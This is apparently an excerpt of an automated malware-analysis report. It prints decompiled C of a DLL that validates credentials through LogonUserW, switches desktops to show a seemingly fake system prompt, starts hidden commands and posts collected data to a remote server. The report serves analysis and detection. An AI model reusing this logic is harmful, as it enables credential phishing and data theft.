                                                                                                                        							if( *((intOrPtr*)(_t39 + 0x20)) > 0) {
                                                                                                                        								do {
                                                                                                                        									FreeLibrary( *( *(_t39 + 0x1c) + _t37 * 4));
                                                                                                                        									_t37 = _t37 + 1;
                                                                                                                        								} while (_t37 <  *((intOrPtr*)(_t39 + 0x20)));
                                                                                                                        								_t30 = _a4;
                                                                                                                        							}
                                                                                                                        							HeapFree(GetProcessHeap(), 0,  *(_t39 + 0x1c));
                                                                                                                        						}
                                                                                                                        						if(( *(_t39 + 8) & 0x00000001) == 0) {
                                                                                                                        							_t24 =  *((intOrPtr*)(_t39 + 0x14));
                                                                                                                        							if(_t24 != 0) {
                                                                                                                        								_t40 =  *_t24( *((intOrPtr*)(_t39 + 0xc)), 0, 0);
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        						_push(0x8000);
                                                                                                                        						_push( &_v4);
                                                                                                                        						_push(_t30);
                                                                                                                        						_push(0xffffffff);
                                                                                                                        						_v4 = 0;
                                                                                                                        						L6F33C2D6();
                                                                                                                        						return _t40;
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        			}










                                                                                                                        APIs
                                                                                                                        • FreeLibrary.KERNEL32 ref: 6F331C57
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F331C69
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F331C70
                                                                                                                        • NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 6F331CA5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Free$Heap$LibraryMemoryProcessVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1020761401-0
                                                                                                                        • Opcode ID: 83e483c244fc649ca1f84219ff7223492add98395c5c5aace1c3365aea7dac1e
                                                                                                                        • Instruction ID: 8eb1d78d45fe5ace4bb96cd64242e8b3ef3c4ae36b17bb0efb469e661d709d61
                                                                                                                        • Opcode Fuzzy Hash: 83e483c244fc649ca1f84219ff7223492add98395c5c5aace1c3365aea7dac1e
                                                                                                                        • Instruction Fuzzy Hash: C221A2729447549FE730DF50D880B63B3E8FB88765F108A1EE49686680C771F848CB61
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F335130(WCHAR* _a4, WCHAR* _a8, WCHAR* _a12) {
                                                                                                                        				void* _v4;
                                                                                                                        				long _t16;
                                                                                                                        				int _t17;
                                                                                                                        
                                                                                                                        				_t16 = 0;
                                                                                                                        				_v4 = 0;
                                                                                                                        				_t17 = LogonUserW(_a4, _a8, _a12, 2, 0,  &_v4);
                                                                                                                        				if(_t17 != 0 || GetLastError() == 0x52f) {
                                                                                                                        					_t16 = 1;
                                                                                                                        					if(_t17 != 0) {
                                                                                                                        						CloseHandle(_v4);
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        				return _t16;
                                                                                                                        			}







                                                                                                                        APIs
                                                                                                                        • LogonUserW.ADVAPI32(0099B7A8,0099B7A8,6F3396ED,00000002,00000000,0099EC68), ref: 6F335150
                                                                                                                        • GetLastError.KERNEL32 ref: 6F33515C
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 6F335177
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseErrorHandleLastLogonUser
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 917161313-0
                                                                                                                        • Opcode ID: 8a47160a5473e4dc22dc13973ab03e83e6c9ed8132db67aae0c621e5db2a02ed
                                                                                                                        • Instruction ID: 93d0e1f3ba18ab7827a6688f8410f9a1ac13c497870c77d73e373aaf97c4f76c
                                                                                                                        • Opcode Fuzzy Hash: 8a47160a5473e4dc22dc13973ab03e83e6c9ed8132db67aae0c621e5db2a02ed
                                                                                                                        • Instruction Fuzzy Hash: B5F05EB7E056516BD620CB19D848E5B77BAEBC9761F01491CF955C7240C730D8008772
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 87%
                                                                                                                        			E6F339D10() {
                                                                                                                        				intOrPtr _v32;
                                                                                                                        				char _v264;
                                                                                                                        				char _v272;
                                                                                                                        				void* _v284;
                                                                                                                        				WCHAR* _v288;
                                                                                                                        				void* _v292;
                                                                                                                        				WCHAR* _v296;
                                                                                                                        				WCHAR* _v300;
                                                                                                                        				char _v324;
                                                                                                                        				char* _v328;
                                                                                                                        				intOrPtr _v332;
                                                                                                                        				WCHAR* _v340;
                                                                                                                        				void* _v344;
                                                                                                                        				void* _v348;
                                                                                                                        				void* _v356;
                                                                                                                        				void* _v360;
                                                                                                                        				void* _v364;
                                                                                                                        				void* _v368;
                                                                                                                        				intOrPtr _v372;
                                                                                                                        				long _v376;
                                                                                                                        				WCHAR* _v380;
                                                                                                                        				char _v384;
                                                                                                                        				void* _v388;
                                                                                                                        				void* _v392;
                                                                                                                        				void* _v396;
                                                                                                                        				char _v400;
                                                                                                                        				struct HINSTANCE__* _v404;
                                                                                                                        				void* _v408;
                                                                                                                        				short _v412;
                                                                                                                        				short _v416;
                                                                                                                        				char _v420;
                                                                                                                        				struct HDESK__* _t62;
                                                                                                                        				struct HDESK__* _t66;
                                                                                                                        				CHAR* _t72;
                                                                                                                        				WCHAR* _t114;
                                                                                                                        				void* _t118;
                                                                                                                        				WCHAR* _t119;
                                                                                                                        				WCHAR* _t120;
                                                                                                                        				struct HDESK__* _t121;
                                                                                                                        				struct HDESK__* _t122;
                                                                                                                        				char _t130;
                                                                                                                        				struct HINSTANCE__* _t136;
                                                                                                                        				void* _t139;
                                                                                                                        				void* _t141;
                                                                                                                        				struct HINSTANCE__* _t142;
                                                                                                                        				WCHAR* _t143;
                                                                                                                        				WCHAR* _t144;
                                                                                                                        				WCHAR* _t145;
                                                                                                                        				WCHAR* _t146;
                                                                                                                        				WCHAR* _t147;
                                                                                                                        				WCHAR* _t148;
                                                                                                                        				WCHAR* _t151;
                                                                                                                        				short* _t153;
                                                                                                                        				short* _t154;
                                                                                                                        				short* _t155;
                                                                                                                        
                                                                                                                        				_t62 =  *0x6f340480; // 0x0
                                                                                                                        				SwitchDesktop(_t62);
                                                                                                                        				_t121 =  *0x6f340480; // 0x0
                                                                                                                        				SetThreadDesktop(_t121);
                                                                                                                        				__imp__CoInitializeEx(0, 6);
                                                                                                                        				_t142 = LoadLibraryA("comctl32.dll");
                                                                                                                        				_v404 = _t142;
                                                                                                                        				if(_t142 != 0) {
                                                                                                                        					_push(0xff000000);
                                                                                                                        					_push(1);
                                                                                                                        					_push( &_v400);
                                                                                                                        					_push(_t142);
                                                                                                                        					_v400 = 0xc590294f;
                                                                                                                        					_v396 = 0;
                                                                                                                        					_v392 = 0;
                                                                                                                        					_v388 = 0;
                                                                                                                        					E6F331DB0();
                                                                                                                        					_t153 =  &(( &_v412)[8]);
                                                                                                                        					if(_v388 != 0) {
                                                                                                                        						_t72 = GetCommandLineA();
                                                                                                                        						_v420 = 0;
                                                                                                                        						_t139 = E6F33A3D0(_t72,  &_v420);
                                                                                                                        						_t154 =  &(_t153[4]);
                                                                                                                        						_v416 = _t139;
                                                                                                                        						if(_t139 != 0) {
                                                                                                                        							if(_v420 > 3) {
                                                                                                                        								_t130 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x996628
                                                                                                                        								wsprintfA( &_v272, "%s%s", _t130, "DFDWiz.exe");
                                                                                                                        								_t155 =  &(_t154[8]);
                                                                                                                        								_t136 = LoadLibraryExA( &_v264, 0, 0x20);
                                                                                                                        								if(_t136 != 0) {
                                                                                                                        									_t141 = HeapAlloc(GetProcessHeap(), 8, 0x1770);
                                                                                                                        									if(_t141 != 0) {
                                                                                                                        										_t23 = _t141 + 0x190; // 0x190
                                                                                                                        										_t143 = _t23;
                                                                                                                        										if(LoadStringW(_t136, 0x79, _t143, 0xc8) > 0) {
                                                                                                                        											_v340 = _t143;
                                                                                                                        										}
                                                                                                                        										_t25 = _t141 + 0x320; // 0x320
                                                                                                                        										_t144 = _t25;
                                                                                                                        										if(LoadStringW(_t136, 0x7c, _t144, 0x3e8) > 0) {
                                                                                                                        											_t114 = StrChrW(_t144, 0xa);
                                                                                                                        											if(_t114 != 0) {
                                                                                                                        												_v340 =  &(_t114[1]);
                                                                                                                        											}
                                                                                                                        										}
                                                                                                                        										_t27 = _t141 + 0xaf0; // 0xaf0
                                                                                                                        										_t145 = _t27;
                                                                                                                        										if(FormatMessageW(0xaff, _t136, 0x50000001, 0, _t145, 0x64, 0) != 0) {
                                                                                                                        											_v288 = _t145;
                                                                                                                        										}
                                                                                                                        										_t29 = _t141 + 0xbb8; // 0xbb8
                                                                                                                        										_t146 = _t29;
                                                                                                                        										if(LoadStringW(_t136, 0x1b0, _t146, 0x64) > 0) {
                                                                                                                        											_t30 = _t141 + 0xc80; // 0xc80
                                                                                                                        											if(LoadStringW(_t136, 0xf6, _t30, 0x64) > 0) {
                                                                                                                        												_t31 = _t141 + 0xc80; // 0xc80
                                                                                                                        												_v372 = _t31;
                                                                                                                        												_v384 = 1;
                                                                                                                        												_v380 = _t146;
                                                                                                                        												_v376 = 8;
                                                                                                                        												_v332 = 2;
                                                                                                                        												_v324 = 1;
                                                                                                                        												_v328 =  &_v384;
                                                                                                                        											}
                                                                                                                        										}
                                                                                                                        										_t40 = _t141 + 0xd48; // 0xd48
                                                                                                                        										_t147 = _t40;
                                                                                                                        										if(LoadStringW(_t136, 0x7e, _t147, 0x64) > 0) {
                                                                                                                        											_v296 = _t147;
                                                                                                                        										}
                                                                                                                        										_t42 = _t141 + 0xe10; // 0xe10
                                                                                                                        										_t148 = _t42;
                                                                                                                        										if(LoadStringW(_t136, 0x7f, _t148, 0x64) > 0) {
                                                                                                                        											_v300 = _t148;
                                                                                                                        										}
                                                                                                                        										_t44 = _t141 + 0xed8; // 0xed8
                                                                                                                        										if(LoadStringW(_t136, 0x81, _t44, 0xc8) > 0) {
                                                                                                                        											PathBuildRootW( &_v412, PathGetDriveNumberA( &_v272));
                                                                                                                        											_t47 = _t141 + 0x1068; // 0x1068
                                                                                                                        											_t120 = _t47;
                                                                                                                        											GetVolumeInformationW( &_v416, _t120, 0x64, 0, 0, 0, 0, 0);
                                                                                                                        											_v412 = 0;
                                                                                                                        											_t50 = _t141 + 0x1130; // 0x1130
                                                                                                                        											_t151 = _t50;
                                                                                                                        											if( *_t120 == 0) {
                                                                                                                        												_t120 = L"<n/a>";
                                                                                                                        											}
                                                                                                                        											_t52 = _t141 + 0xed8; // 0xed8
                                                                                                                        											wsprintfW(_t151, _t52,  &_v416, _t120);
                                                                                                                        											_t155 =  &(_t155[8]);
                                                                                                                        											_v300 = _t151;
                                                                                                                        										}
                                                                                                                        										_t118 = HeapAlloc(GetProcessHeap(), 0, 0x105);
                                                                                                                        										if(_t118 != 0) {
                                                                                                                        											wsprintfA(_t118, "/c start /b \"\" \"%s\" f w %d",  *((intOrPtr*)(_v416 + 0xc)), 5);
                                                                                                                        											E6F339C50(0, 0x83f2, _t118);
                                                                                                                        											_v400( &_v380, 0, 0, 0, 0, 0);
                                                                                                                        											HeapFree(GetProcessHeap(), 0, _t118);
                                                                                                                        											if(_v32 != 0) {
                                                                                                                        												Sleep(0x1f4);
                                                                                                                        												E6F3396D0(0);
                                                                                                                        											}
                                                                                                                        											Sleep(0x1f4);
                                                                                                                        										}
                                                                                                                        										if(FormatMessageW(0xaff, _t136, 0xb0000002, 0, _t141, 0x1f4, 0) != 0) {
                                                                                                                        											_t59 = _t141 + 0x3e8; // 0x3e8
                                                                                                                        											_t119 = _t59;
                                                                                                                        											if(FormatMessageW(0xaff, _t136, 0x50000004, 0, _t119, 0x64, 0) != 0) {
                                                                                                                        												MessageBoxW(0, _t141, _t119, 0x40);
                                                                                                                        												Sleep(0x1f4);
                                                                                                                        											}
                                                                                                                        										}
                                                                                                                        										HeapFree(GetProcessHeap(), 0, _t141);
                                                                                                                        										_t142 = _v404;
                                                                                                                        									}
                                                                                                                        									FreeLibrary(_t136);
                                                                                                                        									_t139 = _v408;
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        							LocalFree(_t139);
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        					FreeLibrary(_t142);
                                                                                                                        				}
                                                                                                                        				__imp__CoUninitialize();
                                                                                                                        				_t66 =  *0x6f340484; // 0x0
                                                                                                                        				SwitchDesktop(_t66);
                                                                                                                        				_t122 =  *0x6f340484; // 0x0
                                                                                                                        				SetThreadDesktop(_t122);
                                                                                                                        				return 0;
                                                                                                                        			}


                                                                                                                        APIs
                                                                                                                        • SwitchDesktop.USER32(00000000), ref: 6F339D1E
                                                                                                                        • SetThreadDesktop.USER32(00000000), ref: 6F339D2B
                                                                                                                        • CoInitializeEx.OLE32(00000000,00000006), ref: 6F339D36
                                                                                                                        • LoadLibraryA.KERNEL32(comctl32.dll), ref: 6F339D41
                                                                                                                        • GetCommandLineA.KERNEL32(?,00000001,FF000000), ref: 6F339D89
                                                                                                                          • Part of subcall function 6F33A3D0: lstrlenA.KERNEL32(?,?,?,?,00000000,?), ref: 6F33A3DB
                                                                                                                          • Part of subcall function 6F33A3D0: LocalAlloc.KERNEL32(00000040,00000004,?,?,?,00000000,?), ref: 6F33A3F4
                                                                                                                        • wsprintfA.USER32 ref: 6F339DD4
                                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000020,?,?,?,?,?,?,00000001,FF000000), ref: 6F339DE8
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00001770,?,?,?,?,?,?,00000001,FF000000), ref: 6F339DFF
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,00000001,FF000000), ref: 6F339E06
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000060), ref: 6F339E1D
                                                                                                                        • LoadStringW.USER32 ref: 6F339E67
                                                                                                                        • LoadStringW.USER32(00000000,00000079,00000190,000000C8), ref: 6F339E80
                                                                                                                        • LoadStringW.USER32(00000000,0000007C,00000320,000003E8), ref: 6F339E99
                                                                                                                        • StrChrW.SHLWAPI(00000320,0000000A), ref: 6F339EA2
                                                                                                                        • FormatMessageW.KERNEL32(00000AFF,00000000,50000001,00000000,00000AF0,00000064,00000000), ref: 6F339ECB
                                                                                                                        • LoadStringW.USER32(00000000,000001B0,00000BB8,00000064), ref: 6F339EEB
                                                                                                                        • LoadStringW.USER32(00000000,000000F6,00000C80,00000064), ref: 6F339F00
                                                                                                                        • LoadStringW.USER32(00000000,0000007E,00000D48,00000064), ref: 6F339F45
                                                                                                                        • LoadStringW.USER32(00000000,0000007F,00000E10,00000064), ref: 6F339F5E
                                                                                                                        • LoadStringW.USER32(00000000,00000081,00000ED8,000000C8), ref: 6F339F7D
                                                                                                                        • PathGetDriveNumberA.SHLWAPI(?), ref: 6F339F8B
                                                                                                                        • PathBuildRootW.SHLWAPI(?,00000000), ref: 6F339F97
                                                                                                                        • GetVolumeInformationW.KERNEL32(?,00001068,00000064,00000000,00000000,00000000,00000000,00000000), ref: 6F339FB5
                                                                                                                        • wsprintfW.USER32 ref: 6F339FE0
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000105), ref: 6F339FFD
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F33A000
                                                                                                                        • wsprintfA.USER32 ref: 6F33A01C
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000001,FF000000), ref: 6F33A048
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,00000001,FF000000), ref: 6F33A04B
                                                                                                                        • Sleep.KERNEL32(000001F4), ref: 6F33A060
                                                                                                                        • Sleep.KERNEL32(000001F4), ref: 6F33A072
                                                                                                                        • FormatMessageW.KERNEL32(00000AFF,00000000,B0000002,00000000,00000000,000001F4,00000000), ref: 6F33A093
                                                                                                                        • FormatMessageW.KERNEL32(00000AFF,00000000,50000004,00000000,000003E8,00000064,00000000), ref: 6F33A0B1
                                                                                                                        • MessageBoxW.USER32(00000000,00000000,000003E8,00000040), ref: 6F33A0BD
                                                                                                                        • Sleep.KERNEL32(000001F4), ref: 6F33A0C8
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F33A0D1
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F33A0D8
                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,00000001,FF000000), ref: 6F33A0E3
                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 6F33A0EF
                                                                                                                        • FreeLibrary.KERNEL32(00000000,00000001,FF000000), ref: 6F33A0F7
                                                                                                                        • CoUninitialize.OLE32 ref: 6F33A0FD
                                                                                                                        • SwitchDesktop.USER32(00000000), ref: 6F33A109
                                                                                                                        • SetThreadDesktop.USER32(00000000), ref: 6F33A116
                                                                                                                          • Part of subcall function 6F331DB0: lstrlenA.KERNEL32(?,?,00000000,?,?,?,?,6F339D7B), ref: 6F331E3E
                                                                                                                          • Part of subcall function 6F331DB0: RtlComputeCrc32.NTDLL(00000000,?,00000000), ref: 6F331E48
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Load$HeapString$Free$DesktopLibraryMessageProcess$AllocFormatSleepwsprintf$LocalPathSwitchThreadlstrlen$BuildCommandComputeCrc32DriveInformationInitializeLineMemoryNumberRootUninitializeVolumeZero
                                                                                                                        • String ID: %s%s$/c start /b "" "%s" f w %d$<n/a>$DFDWiz.exe$`$comctl32.dll
                                                                                                                        • API String ID: 3108343870-2776518243
                                                                                                                        • Opcode ID: 8e95be077a2cb04ddde8d3ab971cf846188fd3db7615309fe69130f1affebdbb
                                                                                                                        • Instruction ID: fc877c8d6a33d97534f31cc0a69ba9fb648d905e22f708a5f35fd157cffaf9bb
                                                                                                                        • Opcode Fuzzy Hash: 8e95be077a2cb04ddde8d3ab971cf846188fd3db7615309fe69130f1affebdbb
                                                                                                                        • Instruction Fuzzy Hash: B3B1937254478AAFEB20DFA0CC85F9B7BADEB45B10F00481CF255961C0DBB5E414CB26
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 98%
                                                                                                                        			E6F335690() {
                                                                                                                        				char* _t71;
                                                                                                                        				long _t87;
                                                                                                                        				void* _t100;
                                                                                                                        				intOrPtr _t102;
                                                                                                                        				void* _t103;
                                                                                                                        				void* _t104;
                                                                                                                        				void* _t105;
                                                                                                                        				void* _t107;
                                                                                                                        				void* _t108;
                                                                                                                        				void* _t109;
                                                                                                                        				void* _t111;
                                                                                                                        				CHAR* _t114;
                                                                                                                        				int _t115;
                                                                                                                        				long _t116;
                                                                                                                        				long _t119;
                                                                                                                        				void* _t122;
                                                                                                                        				intOrPtr _t146;
                                                                                                                        				void* _t147;
                                                                                                                        				void* _t149;
                                                                                                                        				intOrPtr _t150;
                                                                                                                        				void* _t151;
                                                                                                                        				void* _t152;
                                                                                                                        				int _t153;
                                                                                                                        				intOrPtr _t154;
                                                                                                                        				void* _t156;
                                                                                                                        				void* _t157;
                                                                                                                        
                                                                                                                        				 *((intOrPtr*)(_t156 + 0x20)) = 0;
                                                                                                                        				 *(_t156 + 0x1c) = 0;
                                                                                                                        				_t3 = GetTickCount() + 0x493e0; // 0x493e0
                                                                                                                        				_t146 = _t3;
                                                                                                                        				 *((intOrPtr*)(_t156 + 0x38)) = _t146;
                                                                                                                        				while(1) {
                                                                                                                        					_t150 =  *((intOrPtr*)(_t156 + 0x40));
                                                                                                                        					 *(_t156 + 0x18) = 0x842a0000;
                                                                                                                        					if( *(_t150 + 0xc) != 0) {
                                                                                                                        						 *(_t156 + 0x18) = 0x84aa3300;
                                                                                                                        					}
                                                                                                                        					_t71 = M6F340518; // 0x749bb0
                                                                                                                        					_t152 = InternetOpenA(_t71, 1, 0, 0, 0);
                                                                                                                        					 *(_t156 + 0x30) = _t152;
                                                                                                                        					if(_t152 == 0) {
                                                                                                                        						L28:
                                                                                                                        						if(GetTickCount() >= _t146) {
                                                                                                                        							L32:
                                                                                                                        							return  *((intOrPtr*)(_t156 + 0x20));
                                                                                                                        						}
                                                                                                                        						Sleep(0x1388);
                                                                                                                        						continue;
                                                                                                                        					}
                                                                                                                        					 *((intOrPtr*)(_t156 + 0x20)) = 0x4e20;
                                                                                                                        					InternetSetOptionA(_t152, 2, _t156 + 0x14, 4);
                                                                                                                        					InternetSetOptionA(_t152, 5, _t156 + 0x14, 4);
                                                                                                                        					InternetSetOptionA(_t152, 6, _t156 + 0x14, 4);
                                                                                                                        					asm("sbb ecx, ecx");
                                                                                                                        					_t147 = InternetConnectA(_t152,  *(_t150 + 4), ( ~( *(_t150 + 0xc)) & 0x0000016b) + 0x50, 0, 0, 3, 0, 0);
                                                                                                                        					 *(_t156 + 0x34) = _t147;
                                                                                                                        					if(_t147 == 0) {
                                                                                                                        						L26:
                                                                                                                        						InternetCloseHandle(_t152);
                                                                                                                        						if( *(_t156 + 0x1c) != 0) {
                                                                                                                        							goto L32;
                                                                                                                        						}
                                                                                                                        						_t146 =  *((intOrPtr*)(_t156 + 0x38));
                                                                                                                        						goto L28;
                                                                                                                        					}
                                                                                                                        					_t122 = HttpOpenRequestA(_t147, "POST",  *(_t150 + 8), "HTTP/1.1", 0, 0,  *(_t156 + 0x18), 0);
                                                                                                                        					if(_t122 == 0) {
                                                                                                                        						L25:
                                                                                                                        						InternetCloseHandle(_t147);
                                                                                                                        						goto L26;
                                                                                                                        					}
                                                                                                                        					_t151 = HeapAlloc(GetProcessHeap(), 8, 0x800);
                                                                                                                        					if(_t151 == 0) {
                                                                                                                        						L24:
                                                                                                                        						InternetCloseHandle(_t122);
                                                                                                                        						_t147 =  *(_t156 + 0x34);
                                                                                                                        						goto L25;
                                                                                                                        					}
                                                                                                                        					_t87 = wsprintfA(_t151, "%s", "Connection: close\r\n");
                                                                                                                        					_t156 = _t156 + 0xc;
                                                                                                                        					HttpAddRequestHeadersA(_t122, _t151, _t87, 0xa0000000);
                                                                                                                        					_t153 = 0;
                                                                                                                        					 *((intOrPtr*)(_t156 + 0x24)) = 0;
                                                                                                                        					 *((intOrPtr*)(_t156 + 0x28)) = 0;
                                                                                                                        					 *(_t156 + 0x18) = 0;
                                                                                                                        					 *(_t156 + 0x30) = GetTickCount();
                                                                                                                        					 *(_t156 + 0x1c) = RtlRandom(_t156 + 0x2c);
                                                                                                                        					_t149 = HeapAlloc(GetProcessHeap(), 8, 0x800);
                                                                                                                        					if(_t149 != 0) {
                                                                                                                        						 *(_t156 + 0x34) = _t149;
                                                                                                                        						_t153 = wsprintfA(_t149, "----------%lu\r\nContent-Disposition: form-data; name=\"%s\"\r\nContent-Type: text/plain\r\nContent-Transfer-Encoding: binary\r\n\r\n",  *(_t156 + 0x14),  *(_t156 + 0x44));
                                                                                                                        						_t30 = _t153 + 1; // 0x1
                                                                                                                        						_t114 = _t149 + _t30;
                                                                                                                        						 *(_t156 + 0x44) = _t114;
                                                                                                                        						_t115 = wsprintfA(_t114, "----------%lu--\r\n\r\n",  *((intOrPtr*)(_t156 + 0x24)));
                                                                                                                        						_t133 =  *((intOrPtr*)(_t156 + 0x5c));
                                                                                                                        						 *(_t156 + 0x34) = _t115;
                                                                                                                        						_t116 = wsprintfA(_t151, "Content-Length: %lu\r\n",  *((intOrPtr*)( *((intOrPtr*)(_t156 + 0x5c)) + 0x28)) +  *((intOrPtr*)( *((intOrPtr*)(_t156 + 0x5c)) + 0x20)) +  *((intOrPtr*)(_t133 + 0x18)) + _t115 + _t153);
                                                                                                                        						_t157 = _t156 + 0x28;
                                                                                                                        						HttpAddRequestHeadersA(_t122, _t151, _t116, 0xa0000000);
                                                                                                                        						_t119 = wsprintfA(_t151, "Content-Type: multipart/form-data; boundary=--------%lu\r\n",  *((intOrPtr*)(_t157 + 0x14)));
                                                                                                                        						_t156 = _t157 + 0xc;
                                                                                                                        						HttpAddRequestHeadersA(_t122, _t151, _t119, 0xa0000000);
                                                                                                                        					}
                                                                                                                        					if(HttpSendRequestExA(_t122, 0, 0, 0, 0) == 0) {
                                                                                                                        						if(GetLastError() == 0x2f7d) {
                                                                                                                        							 *( *((intOrPtr*)(_t156 + 0x40)) + 0xc) = 0;
                                                                                                                        						}
                                                                                                                        						L21:
                                                                                                                        						if(_t149 != 0) {
                                                                                                                        							HeapFree(GetProcessHeap(), 0, _t149);
                                                                                                                        						}
                                                                                                                        						HeapFree(GetProcessHeap(), 0, _t151);
                                                                                                                        						_t152 =  *(_t156 + 0x30);
                                                                                                                        						goto L24;
                                                                                                                        					}
                                                                                                                        					 *((intOrPtr*)(_t156 + 0x20)) = _t153;
                                                                                                                        					_t100 = E6F3354E0(_t122,  *((intOrPtr*)(_t156 + 0x24)), _t156 + 0x14);
                                                                                                                        					_t156 = _t156 + 0xc;
                                                                                                                        					_t154 =  *((intOrPtr*)(_t156 + 0x40));
                                                                                                                        					if(_t100 != _t153) {
                                                                                                                        						L19:
                                                                                                                        						HttpEndRequestA(_t122, 0, 0, 0);
                                                                                                                        						if( *(_t156 + 0x1c) != 0) {
                                                                                                                        							_t102 = E6F335540(_t122, _t154 + 0x2c);
                                                                                                                        							_t156 = _t156 + 8;
                                                                                                                        							 *((intOrPtr*)(_t156 + 0x20)) = _t102;
                                                                                                                        						}
                                                                                                                        						goto L21;
                                                                                                                        					}
                                                                                                                        					_t103 = _t154 + 0x18;
                                                                                                                        					if( *((intOrPtr*)(_t154 + 0x18)) == 0) {
                                                                                                                        						L13:
                                                                                                                        						_t104 = _t154 + 0x20;
                                                                                                                        						if( *((intOrPtr*)(_t154 + 0x20)) == 0) {
                                                                                                                        							L15:
                                                                                                                        							_t105 = _t154 + 0x28;
                                                                                                                        							if( *((intOrPtr*)(_t154 + 0x28)) == 0) {
                                                                                                                        								L17:
                                                                                                                        								 *(_t156 + 0x30) =  *(_t156 + 0x18);
                                                                                                                        								_t107 = E6F3354E0(_t122,  *((intOrPtr*)(_t156 + 0x28)), _t156 + 0x24);
                                                                                                                        								_t156 = _t156 + 0xc;
                                                                                                                        								if(_t107 ==  *(_t156 + 0x18)) {
                                                                                                                        									 *(_t156 + 0x1c) = 1;
                                                                                                                        								}
                                                                                                                        								goto L19;
                                                                                                                        							}
                                                                                                                        							_t108 = E6F3354E0(_t122,  *((intOrPtr*)(_t154 + 0x24)), _t105);
                                                                                                                        							_t156 = _t156 + 0xc;
                                                                                                                        							if(_t108 !=  *((intOrPtr*)(_t154 + 0x28))) {
                                                                                                                        								goto L19;
                                                                                                                        							}
                                                                                                                        							goto L17;
                                                                                                                        						}
                                                                                                                        						_t109 = E6F3354E0(_t122,  *((intOrPtr*)(_t154 + 0x1c)), _t104);
                                                                                                                        						_t156 = _t156 + 0xc;
                                                                                                                        						if(_t109 !=  *((intOrPtr*)(_t154 + 0x20))) {
                                                                                                                        							goto L19;
                                                                                                                        						}
                                                                                                                        						goto L15;
                                                                                                                        					}
